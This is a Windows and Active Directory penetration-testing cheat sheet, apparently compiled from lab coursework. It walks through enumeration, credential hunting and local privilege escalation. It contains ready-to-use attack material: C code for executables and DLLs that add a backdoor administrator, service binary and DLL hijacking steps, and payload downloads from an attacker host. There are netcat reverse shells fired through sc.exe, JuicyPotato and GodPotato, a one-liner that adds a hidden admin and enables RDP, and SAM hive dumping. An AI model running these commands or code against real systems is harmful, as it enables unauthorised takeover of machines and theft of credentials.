Windows

Exploits Flowchart

I have…

• No domain account access
  • A list of usernames but an unknown password
• Domain account access
  • List of usernames but an unknown password
  • SeDebugPrivilege right (default given to admins)
  • Domain Admins / Enterprise Admins / Administrators / Domain Controllers membership
  • Hash of a service account (they have an SPN)
  • Hash for the krbtgt account
  • Domain Admins membership
  • GenericAll or GenericWrite permissions on a user object
    • Disable Kerberos pre-authentication then
    • Add an SPN then

Lateral Movement Flowchart

I have a…

• Password & username
  • For user with Administrators membership on remote machine
    • $ADMIN share available & File and Printer Sharing enabled (both yes by default)
  • For user with Remote Management Users membership on remote machine
  • For user with Remote Desktop Users membership on remote machine & port 3389 open
• Hash & username
  • For user with Administrators membership on remote machine
    • $ADMIN share available & File and Printer Sharing enabled (both yes by default)
    • WinRM enabled on remote machine (port 5985 or 5986 open)
  • For user with Remote Desktop Users membership on remote machine & port 3389 open
• Cached TGS:
• Saved credentials:
• Session with administrator privileges:

Enumeration

User and group information

Information about the current user

C:\Users\dave> whoami /all
C:\htb> echo %USERNAME%

User rights (more may be listed within an elevated cmd/PS session); enable a privilege with this script:

PS C:\htb> whoami /priv

Other users and groups

PS C:\Users\dave> Get-LocalUser
C:\htb> net user
 
PS C:\Users\dave> Get-LocalGroup
C:\htb> net localgroup

Members of a group:

PS C:\Users\dave> Get-LocalGroupMember adminteam
C:\htb> net localgroup adminteam

Logged in users:

C:\htb> query user

Password policy:

C:\htb> net accounts

Powerful groups:

Default Administrators
Server Operators
Server Operators
Backup Operators
Print Operators
Hyper-V Administrators
Account Operators
Remote Desktop Users
Remote Management Users
Group Policy Creator Owners
Schema Admins
DNS Admins

Powerful Privileges/Rights:

SeNetworkLogonRight
SeRemoteInteractiveLogonRight
SeBackupPrivileges
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeLoadDriverPrivilege
SeRestorePrivilege
SeAssignPrimaryTokenPrivilege
SeManageVolumePrivilege

Users & groups

Users

# net.exe
C:\Users\stephanie>net user /domain
C:\Users\stephanie>net user jeffadmin /domain
 
# PowerView
PS C:\Tools> Get-NetUser
PS C:\Tools> Get-NetUser | select cn,pwdlastset,lastlogon
PS C:\htb> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
 
# Enum4linux
enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
 
# rpcclient
rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers
 
# Crackmapexec
crackmapexec smb 172.16.5.5 --users
crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users
crackmapexec smb 192.168.222.122 -u 'fmcsorley' -p 'CrabSharkJellyfish192' --users | grep -oP '(?<=\\)[^\s]+' > usernames.txt
 
# LDAP
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "
 
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
 
# PS ActiveDirectory Module
PS C:\htb> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
 
# SharpView
PS C:\htb> .\SharpView.exe Get-DomainUser -Identity forend

Groups

C:\Users\stephanie>net group /domain PS
C:\Tools> net group "Sales Department" /domain
 
# PowerView
PS C:\Tools> Get-NetGroup | select cn
PS C:\Tools> Get-NetGroup "Sales Department" | select member
PS C:\htb>  Get-DomainGroupMember -Identity "Domain Admins" -Recurse
 
# CrackMapExec
bubbleman@htb\[htb]$ sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
 
# PS ActiveDirectory Module
PS C:\htb> Get-ADGroup -Filter * | select name
PS C:\htb> Get-ADGroup -Identity "Backup Operators"  # group info
PS C:\htb> Get-ADGroupMember -Identity "Backup Operators"  # group members

Logged on Users

# PowerView
# Warning: this command might not work on machines running Windows Server 2019 build 1809 or Windows 10 build 1709. It may also not work if the current user doesn't have the correct permissions. It may give a result, but that result might be false.
PS C:\Tools> Get-NetSession -ComputerName files04 -Verbose
 
# PsLoggedOn.exe
# Warning: this tool relies on the _Remote Registry_ service to work, but that service has not been enabled by default on Windows since Windows 8. The tool may also show our current user as logged on on other machines, because the tool requires to log on temporarily to work.
PS C:\Tools\PSTools> .\PsLoggedon.exe \\files04
 
# CrackMapExec
bubbleman@htb\[htb]$ sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users
 
# cmd.exe
PS C:\htb> qwinsta

Where current user is Admin

# PowerView
PS C:\Tools> Find-LocalAdminAccess

(AD) Brute force users

Kerbrute

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
 
# Wordlists
Small - /usr/share/wordlists/metasploit/namelist.txt
Medium - /usr/share/seclists/Usernames/Names/names.txt
Large - /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
 
# Output valid usernames to a text file
kerbrute userenum -d nagoya-industries.com --dc 192.168.182.21 ~/boxes/pg-nagoya/possible-ad-usernames.txt | grep "VALID USERNAME" | sed 's/.*VALID USERNAME:\s*//' | cut -d'@' -f1 > usernames.txt

Machine information

OS and architecture (and whether the machine has been patched recently):

PS C:\Users\dave> systeminfo

If systeminfo doesn’t display hotfixes (KBs), try WMI:

C:\htb> wmic qfe
PS C:\hbt> Get-HotFix | ft -AutoSize

Network information

Network interfaces:

PS C:\Users\dave> ipconfig /all

Routing table:

PS C:\Users\dave> route print

Active network connections (look for processes that only face internally):

PS C:\Users\dave> netstat -ano

ARP table:

PS C:\htb> arp -a

Port scan:

PS C:\Users\student> 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $\_)) "TCP port $_ is open"} 2>$null

Test one port (eg SMB): Port scan for an SMB server:

PS C:\Users\student> Test-NetConnection -Port 445 192.168.50.151

Installation applications

32-bit applications:

PS C:\Users\dave> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

64-bit applications:

PS C:\Users\dave> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

32- and 64-bit applications:

dir C:\Program Files

WMI:

C:\htb> wmic product get name
PS C:\htb> Get-WmiObject -Class Wind32_Product | select Name, Version

Permissions on a service (stop/start?)

Get-ServiceAcl

"IObitUnSvr" | Get-ServiceAcl | select -ExpandProperty Access

Running processes

Running processes:

PS C:\Users\dave> Get-Process
C:\htb> tasklist /svc

Active network connections:

PS C:\htb> netstat -ano

Named pipes

• Processes can communicate with each other using named pipes
• Pipes are essentially files stored in memory that get cleared out after being read
• Every active connection to a named pipe server results in the creation of a new named pipe

Use the Sysinternals tool Pipelist to enumerate instances of names pipes.

C:\htb> pipelist.exe /accepteula
PS C:\htb>  gci \\.\pipe\

File permissions

We can use Accesschk to enumerate permissions.

Review permissions on the LSASS named pipe (a file in memory):

C:\htb> accesschk.exe /accepteula \\.\Pipe\lsass -v

Review all named pipes:

.\accesschk.exe /accepteula \pipe\

Review all named pipes that allow write access:

accesschk.exe -w \pipe\* -v

Search files or folders

File extension is

PS C:\Users\dave> gci "C:\" -Include *.kdbx,*.txt -File -Recurse -ErrorAction SilentlyContinue

Folder name contains

• -force includes hidden files/folders

PS C:\> gci "C:\" -recurse -force -erroraction silentlycontinue | where {$_.name -like "*transcript*"}

Command line history

PS history:

PS C:\Users\dave> Get-History

PSReadLine

# Get the filepath for the PSReadLine history file
PS C:\Users\dave> (Get-PSReadlineOption).HistorySavePath
 
# Output the file contents
PS C:\Users\dave> type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PowerShell transcript-related files/folders

gci "C:\" -recurse -force -erroraction silentlycontinue | where {$_.name -like "*transcript*"}

Environmental variables

List them:

set
dir env:

Saved credentials cmdkey /list

List any saved credentials:

C:\PrivEsc>cmdkey /list

Use a saved credential to run an executable:

C:\PrivEsc>runas /savecred /user:admin C:\PrivEsc\reverse.exe

'Always Install Elevated' enabled?

Check status (if 0x1 then enabled)

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 

Check if credentials work

CrackMapExec

crackmapexec smb 10.10.x.142 -u celia.almeda -p 7k8XHk3dMtmpnC7

Enumerate object permissions

PowerView

Enumerate all ACEs for offsec user object and auto resolve SIDs

PS C:\tools> Get-ObjectAcl -Identity offsec -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}

Antivirus settings

AppLockerpolicy (determines what binaries and file types can run):

PS C:\> Get-AppLockerPolicy [-Local | -Domain | -Effective]
 
PS C:\htb> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
 
# Test an file against Applocker policy:
PS C:\htb> Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

Windows Defender status:

# PowerShell
PS C:\htb> Get-MpComputerStatus
# cmd.exe
C:\htb> sc query windefend

PowerShell Constrained Language Mode

Constrained Language Mode locks down many of the features needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows and PowerShell classes.

PowerShell

PS C:\htb> $ExecutionContext.SessionState.LanguageMode  #

LAPS (Local Administrator Password Solution)

The Microsoft Local Administrator Password Solution (LAPS) is used to randomise and rotate local administrator passwords in attempt to prevent lateral movement.

The LAPSToolkit aids enumeration.

# Find groups that contain users who can read LAPS passwords
PS C:\htb> Find-LAPSDelegatedGroups
 
# Check the rights on each computer with LAPS enabled for any groups with read access and users with "All Extended Rights". Users with this right can read LAPS passwords and may be less protected than users in delegated groups.
PS C:\htb> Find-AdmPwdExtendedRights
 
# Find LAPS-enabled passwords
PS C:\htb> Get-LAPSComputers

Host Discovery

Wireshark

# filters
arp
mdns

pktmon.exe (LOLBAS- installed by default on Windows 10 onwards)

pktmon.exe start --etw
pktmon.exe stop

Responder

# -A passively listen (and don't send any poisoned packets)
sudo responder -I ens224 -A

tcpdump

sudo tcpdump -i ens224

fping

# -a show targets that are alive
# -s print stats at the end of the scan
# -g generate a target list from the CIDR network
# -q to not show per-target results
fping -asgq 172.16.5.0/24

Domain Info / password policy

Domain

# PowerShell
PS C:\Tools> Get-NetDomain
 
# PS ActiveDirectory Module
PS C:\htb> Get-ADDomain

Domain Trusts

# PS ActiveDirectory Module
PS C:\htb> Get-ADTrust -Filter *
 
# PowerView
PS C:\htb> Get-DomainTrustMapping

Password policy

# net.exe
# Lockout threshold = number of incorrect attempts to lock the account
# Lockout duration = number of minutes the account will be locked for
# Observation window = number of minutes after which number of attempts resets
PS C:\Users\jeff> net accounts
 
# PowerView
Get-DomainPolicy
 
net use \\DC01\ipc$ "" /u:""
net use \\DC01\ipc$ "" /u:guest
net use \\DC01\ipc$ "password" /u:guest
 
# CME
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
 
# RPC
rpcclient -U "" -N 172.16.5.5
rpcclient $> querydominfo
rpcclient $> getdompwinfo
 
# Enum4Linux (combines nmblookup, rpcclient and smbclient)
enum4linux -P 172.16.5.5

Ldapsearch

# PwdProperties set/unset = 1/0
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Domain Computers / Shares

Domain Computers

# PowerView
PS C:\Tools> Get-NetComputer
PS C:\Tools> Get-NetComputer | select operatingsystem,dnshostname
PS C:\Tools> Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion

Domain Shares

# SYSVOL share
# There may be GPP encrypted passwords in there (easily decrypted)
PS C:\Tools> ls \\dc1.corp.com\sysvol\corp.com\
PS C:\Tools> cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
 
# PowerView
# "-CheckShareAccess" only displays those that are available to our current user
PS C:\Tools> Find-DomainShare [-CheckShareAccess]
 
# CME
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares

Vulnerable accounts (AS-REP roastable & pre-auth disabled accounts)

AS-REP roastable accounts:

PowerView:

PS C:\Tools> Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Impacket:

• -request to obtain the NTLM hash of the account
• -outputfile to write the obtained hash to a file

kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 [-request] [-outputfile hashes.asreproast] corp.com/pete

---

Kerberos pre-authentication disabled accounts:

PS C:\Tools> Get-DomainUser -KerberosPreuthNotRequired

SPNs

Find accounts with SPNs

# setspn.exe
c:\Tools> setspn -L iis_service
c:\Tools> setspn -T corp -Q */*   # Extract all SPNs
 
# PowerShell
PS C:\Tools> get-adobject | Where-Object {$\_.serviceprincipalname -ne $null -and $\_.distinguishedname -like "*CN=Users*" -and $\_.cn -ne "krbtgt"}
 
PS C:\Tools> get-adobject -filter {serviceprincipalname -like “*sql*”} -prop serviceprincipalname
 
# PowerView
PS C:\Tools> Get-NetUser -SPN | select samaccountname,serviceprincipalname
PS C:\htb> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

SPN to IP address

PS C:\Tools\> nslookup.exe web04.corp.com

Convert an SID to a name

PowerView

# one SID
PS C:\Tools> Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
 
# multiple SIDs
PS C:\Tools> "S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName

BloodHound

Collection

# On the victim - PS1
PS C:\Tools> Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit"
 
# On the victim - exe
PS C:\htb> .\SharpHound.exe -c All --zipfilename ILFREIGHT
 
# From Kali
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all --zip

Parsing

kali@kali:~$ sudo neo4j start
kali@kali:~$ bloodhound

DCSync rights

dsacls

dsacls "DC=egotistical-bank,dc=local" | findstr /i "svc_loanmgr"

---

PowerShell

Import-Module ActiveDirectory
 
(Get-Acl -Path "AD:DC=egotistical-bank,DC=local").Access | Where-Object { $_.IdentityReference -like "*EGOTISTICALBANK\svc_loanmgr*"}

PowerView

# Get the user's SID
PS C:\htb> Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof,useraccountcontrol |fl
 
# Check that ACEs for the domain for any relating to our user
PS C:\htb> $sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
PS C:\htb> Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Then lookout for either an object with (MS docs):

• ActiveDirectoryRights = ExtendedRight
• ObjectType =
  • 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All)
  • 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes)
  • 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set)

Cached GPP passwords

Search

# Internally
C:\ProgramData\Microsoft\Group Policy\history
 
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history
 
# Externally (on SMB share)
Usually in Policies folder
crackmapexec smb -L | grep gpp
 
# Example result
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" 

Decrypt

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPOs

Enumerate GPO names

# PowerView
PS C:\htb> Get-DomainGPO |select displayname
# Built-in
PS C:\htb> Get-GPO -All | Select DisplayName

Enumerate GPO rights

PS C:\htb> $sid=Convert-NameToSid "Domain Users"
# PowerView
PS C:\htb> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Abuse rights on a GPO

ACLs

Guides on how to exploit certain permissions on certain objects

PowerView

# All
PS C:\htb> Find-InterestingDomainAcl
 
# ----- Targeting a user
PS C:\htb> $sid = Convert-NameToSid wley
 
# ResolveGUIDs turns coded ObjectAceType GUIDs into human readable values
PS C:\htb> Get-DomainObjectACL [-ResolveGUIDs] -Identity * | ? {$_.SecurityIdentifier -eq $sid}
 
# Get the raw ObjectAceType GUIDs
PS C:\htb> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
# -----

Get-ACL & Get-ADUser

# Create a list of domain user
PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
 
# For loop to see what permissions our current user has over the list of domain users
PS C:\htb> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl  "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
 
# Resolve the coded GUID into a human readable format
PS C:\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529"
PS C:\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

PowerUp.ps1

Check everything

Invoke-AllChecks

Files

Owner

Get-ChildItem -Path .\ | Select-Object FullName, @{Name="Owner"; Expression={(Get-Acl $_.FullName).Owner}} | Format-Table -AutoSize

Exploits

Hijacking Service Binaries

Info - Services and their binary files

Each Windows service has an associated binary file, which are executed when the service is started or transitioned into a running state.

Exploit - Insecure permissions on the service binary file

If a service binary file has insecure permissions, we might be able to replace the file with a malicious one. This file is then executed when the service is restarted or the machine is rebooted. Upon restart, the malicious binary is executed with the privileges of the service, eg LocalSystem.

List the running services

List the running services and the paths to their binaries:

PS C:\Users\dave> Get-CimInstance -ClassName win32_service | Select
Name,State,PathName | Where-Object {$_.State -like 'Running'}

This could also be done with:

1. services.msc
2. Get-Service cmdlet

Find a service binary with write permissions granted

An example with no write permissions:

# dave only has Read and Execute (RX) rights on httpd.exe
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe" C:\xampp\apache\bin\httpd.exe
  BUILTIN\Administrators:(F)
  NT AUTHORITY\SYSTEM:(F)
  BUILTIN\Users:(RX)
  NT AUTHORITY\Authenticated Users:(RX)
 
Successfully processed 1 files; Failed processing 0 files
 
An example with full permissions (ie including write):
PS C:\Users\dave> icacls "C:\xampp\mysql\bin\mysqld.exe" C:\xampp\mysql\bin\mysqld.exe
  NT AUTHORITY\SYSTEM:(F)
  BUILTIN\Administrators:(F)
  BUILTIN\Users:(F)
 
Successfully processed 1 files; Failed processing 0 files

Other options include the PowerShell Cmdlet Get-ACL.

Create a malicious binary

Create a malicious binary.

The adduser.c binary will create a new dave2 user and add them to the local Administrators group using the system function:

adduser.c

#include <stdlib.h>
 
int main ()
{  
 int i;
 i = system ("net user dave2 password123! /add");  
 i = system ("net localgroup administrators dave2 /add");
 return 0;
}

---

Compile it.

The target machine is 64-bit so we’ll cross-compile the C code to a 64-bit application with x86_64-w64-mingw32-gcc.

• -o to specify the name of the compiled executable

kali@kali:~$ x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Transfer the malicious binary to the target machine.

Transfer it ():

PS C:\Users\dave> iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe

Move it to replace the original binary:

PS C:\Users\dave> move C:\xampp\mysql\bin\mysqld.exe mysqld.exe  
PS C:\Users\dave> move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

Restart the service or reboot the machine

Limitation - restarting the service requires suitable permissions

Check if the service Startup Type is set to “Automatic”. (If so it should restart upon a reboot of the machine.)

PS C:\Users\dave> Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$\_.Name -like 'mysql'}
 
Name StartMode
---- ---------
mysql Auto

Reboot the machine.

• /r to reboot instead of shutdown
• /t 0 to reboot in zero seconds

PS C:\Users\dave> shutdown /r /t 0

Automate the exploit with PowerUp

Transfer to the Windows machine ():

PS C:\Users\dave> iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1

Run PowerUp:

PS C:\Users\dave> powershell -ep bypass
PS C:\Users\dave> . .\PowerUp.ps1
PS C:\Users\dave> Get-ModifiableServiceFile

Change service binary path

See if have necessary rights (ChangeConfig, Start, Stop)

Get-ServiceAcl

"IObitUnSvr" | Get-ServiceAcl | select -ExpandProperty Access

Change service binary path

Edit service config

sc.exe config IObitUnSvr binPath="cmd.exe /c C:\Users\dharding\Documents\nc.exe -e cmd.exe 10.10.X.Y 1234"

Restart service

sc.exe stop
sc.exe start

Hijacking Service DLLs

Info - The search order for a DLL

The search order is defined by Microsoft and determines what to inspect first when searching for DLLs. The following list shows the standard search order:

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable.

The safe search order causes the current directory to be searched at position 2.

Exploit - A binary attempts to load a DLL that doesn't exist

A binary might attempt to load a DLL that doesn’t exist on the system. We can try placing a malicious DLL in a path of the DLL search order so it executes when then binary is started.

We need to find all DLLs loaded by a target binary (service) as well as detect missing ones. Once done we could either:

1. replace one with our own malicious DLL if we have write permissions
2. provide our own malicious DLL if one is missing

Find a service binary using vulnerable DLLs

List the running services and the paths to their binaries:

PS C:\Users\dave> Get-CimInstance -ClassName win32_service | Select
Name,State,PathName | Where-Object {$_.State -like 'Running'}

This could also be done with:

1. services.msc
2. Get-Service cmdlet

Search for a writeable or missing DLL for the service

Either:

1. Via the process monitor (requires GUI access and admin privileges)
2. Via copying the target service binary to our Windows machine, installing the corresponding service on it, then use the Process Monitor

---

Via the process monitor.

We might need to restart the service to get any results in Process Monitor:

PS C:\Users\steve> Restart-Service BetaService

We find a DLL ( myDLL) that cannot be found and is searched for in a location we have access to (ie. the home directory of Steve).

Create a malicious DLL to replace the original one

Create it: (This will create a new user and add them to the administrators group).

myDLL.cpp

#include <stdlib.h>
#include <windows.h>
 
BOOL APIENTRY DllMain(  
HANDLE hModule,// Handle to DLL module  
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved  
{
 switch ( ul_reason_for_call )
 {  
 case DLL_PROCESS_ATTACH: // A process is loading the DLL.  
 	int i;  
 	i = system ("net user dave2 password123! /add");  
 	i = system ("net localgroup administrators dave2 /add");
 	break;  
 	case DLL_THREAD_ATTACH: // A process is creating a new thread.
 	break;  
 	case DLL_THREAD_DETACH: // A thread exits normally.  
 	break;  
 	case DLL_PROCESS_DETACH: // A process unloads the DLL.  
 	break;
 }
 return TRUE;
}

Compile it:

kali@kali:~$ x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Transfer the malicious DLL to the target machine

.

Restart the service

PS C:\Users\steve\Documents> Restart-Service BetaService

Unquoted Service Paths

Exploit - The service binary path contains a space

If the file path to a service binary contains a space, the file path will be interpreted in various ways. For example, for the service binary path of C:\Program Files\My Program\My Service\service.exe, Windows uses the following order to try start the executable file:

C:\Program.exe
C:\Program Files\My.exe  
C:\Program Files\My Program\My.exe  
C:\Program Files\My Program\My service\service.exe

We can create a malicious executable and place it in a directory that corresponds with one of the possible file paths whilst matching its file name to the corresponding interpreted file name. For example: name our executable Program.exe and place it in C:/.

Find a suitable unquoted service path

Enumerate running and stopped services: (Via Get-CimInstance or wmic)

PS C:\Users\steve> Get-CimInstance -ClassName win32_service | Select Name,State,PathName
 
C:\Users\steve> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

---

Ensure that we can stop/start the service:

PS C:\Users\steve> Start-Service GammaService
PS C:\Users\steve> Stop-Service GammaService

---

Check we have write access for at least one of the possible paths: For:

C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

We’d check:

C:\Program.exe
PS C:\Users\steve> icacls "C:\"
 
C:\Program Files\Enterprise.exe
PS C:\Users\steve> icacls "C:\Program Files"
 
C:\Program Files\Enterprise Apps\Current.exe
PS C:\Users\steve> icacls "C:\Program Files\Enterprise Apps"
# We have write access to the Enterprise Apps folder

Create a malicious binary and move it to the chosen folder

Create a binary. It creates a user and adds them to the admin group.

adduser.c

#include <stdlib.h>
 
int main ()
{  
 int i;
 i = system ("net user dave2 password123! /add");  
 i = system ("net localgroup administrators dave2 /add");
 return 0;
}

---

Compile it.

The target machine is 64-bit so we’ll cross-compile the C code to a 64-bit application with x86_64-w64-mingw32-gcc.

• -o to specify the name of the compiled executable

kali@kali:~$ x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

___
Transfer the binary to the victim machine. See options [](Transfer%20Files.md#Transfer%20to%20Windows|here).
___
Copy the binary to the chosen folder:
```powershell
PS C:\Users\steve> copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'

Restart the service

Restart:

PS C:\Users\steve> Start-Service GammaService

---

The service should restart and execute the malicious binary, because it will look for it in the folder we placed it before it looks for the original authenticate binary.

Automate the exploit with PowerUp

If successful, PowerUp will create a new local user called john with the password Password123!. The user is then added to the local Admin group.

PS C:\Users\dave> Get-UnquotedService
PS C:\Users\steve> Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

Scheduled Tasks

Info - What are scheduled tasks?

Scheduled Tasks are used to execute various automated tasks, like clean-up activities and update management. These tasks have one or more triggers, which when met cause an action.

Exploit - a scheduled task could allow code execution as a privileged user

Find a vulnerable scheduled task

We are looking for the following three things:

1. The task is executed as a higher privileged user
2. The task will be triggered soon
3. When triggered the task will execute something we can take advantage of.

---

View the scheduled tasks:

Get-ScheduledTask  # PowerView
PS C:\Users\steve> schtasks /query /fo LIST /v

We find a task that will execute the following binary C:\Users\steve\Pictures\BackendCacheCleanup.exe.

Exploit the found scheduled task

Check if we have write access to the Picture folder:

PS C:\Users\steve> icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
C:\Users\steve\Pictures\BackendCacheCleanup.exe
  NT AUTHORITY\SYSTEM:(I)(F)
  BUILTIN\Administrators:(I)(F)
  CLIENTWK220\steve:(I)(F)
  CLIENTWK220\offsec:(I)(F)

---

Create a malicious binary: It creates a user and adds them to the admins group.

adduser.c

#include <stdlib.h>
 
int main ()
{  
 int i;
 i = system ("net user dave2 password123! /add");  
 i = system ("net localgroup administrators dave2 /add");
 return 0;
}

---

Compile it (ensure 64-bit compiler is correct):

kali@kali:~$ x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

---

Transfer it to the victim machine. See options .

---

Replace it with the original binary and wait for the scheduled tasks to execute it:

PS C:\Users\steve> move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
PS C:\Users\steve> move .\BackendCacheCleanup.exe .\Pictures\

Privileges (Se…)

SeImpersonatePrivilege

PrintSpoofer (Windows 10 & Server 2019 where JuicyPotato doesn't work)

Run it on the victim:

• -c to specify the command we want to execute (powershell)
• -i to interact with the process in the current command prompt

PrintSpoofer64.exe -i -c powershell.exe
PrintSpoofer64.exe -c "cmd /c powershell -c C:/Windows/Tasks/rev.ps1"

JuicyPotato (requires < Windows Server 2019 or Windows 10 build 1809)

• (Having setup a listener on port 8443)
• -l is the COM server listening port
• -p is the program to launch (cmd.exe)
• -a is the argument passed to cmd.exe
• -t is the createprocess call (try both CreateProcessWithTokenW and CreateProcessAsUser)
• -c CLSID

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

./JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -a "/c c:\users\sophie\documents\nc.exe -e cmd.exe 10.10.X.Y 1234" -l 63636 -c "{8BC3F05E-D86B-11D0-A075-00C04FB68820}"

Possible CLSIDs

GodPotato

Command

GodPotato -cmd "cmd /c whoami"

Reverse shell

GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Create Admin user

GodPotato -cmd "net user /add backdoor Password123"
GodPotato -cmd "net localgroup administrators /add backdoor"
RunasCs.exe backdoor Password123 "C:/Users/Public/reverse.exe" --force-profile --logon-type 8

One liner add Admin user and enable RDP

net user /add bubbleman Password123! && net localgroup administrators bubbleman /add & net localgroup "Remote Desktop Users" bubbleman /add & netsh advfirewall firewall set rule group="remote desktop" new enable=Yes & reg add HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v bubbleman /t REG_DWORD /d 0 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f & sc config TermService start= auto

SeBackupPrivilege

Extract local hashes from the SAM and SYSTEM hives

Create a copy of the hives

reg save hklm\system C:\Users\molly.smith\temp\system  # writeable folder
reg save hklm\sam C:\Users\molly.smith\temp\sam   # writeable folder

Transfer those copies to Kali

Extract hashes for local accounts from the hives

impacket-secretsdump -sam ./sam -system ./system local

SeManageVolumePrivilege

tzres.dll

Run this exploit

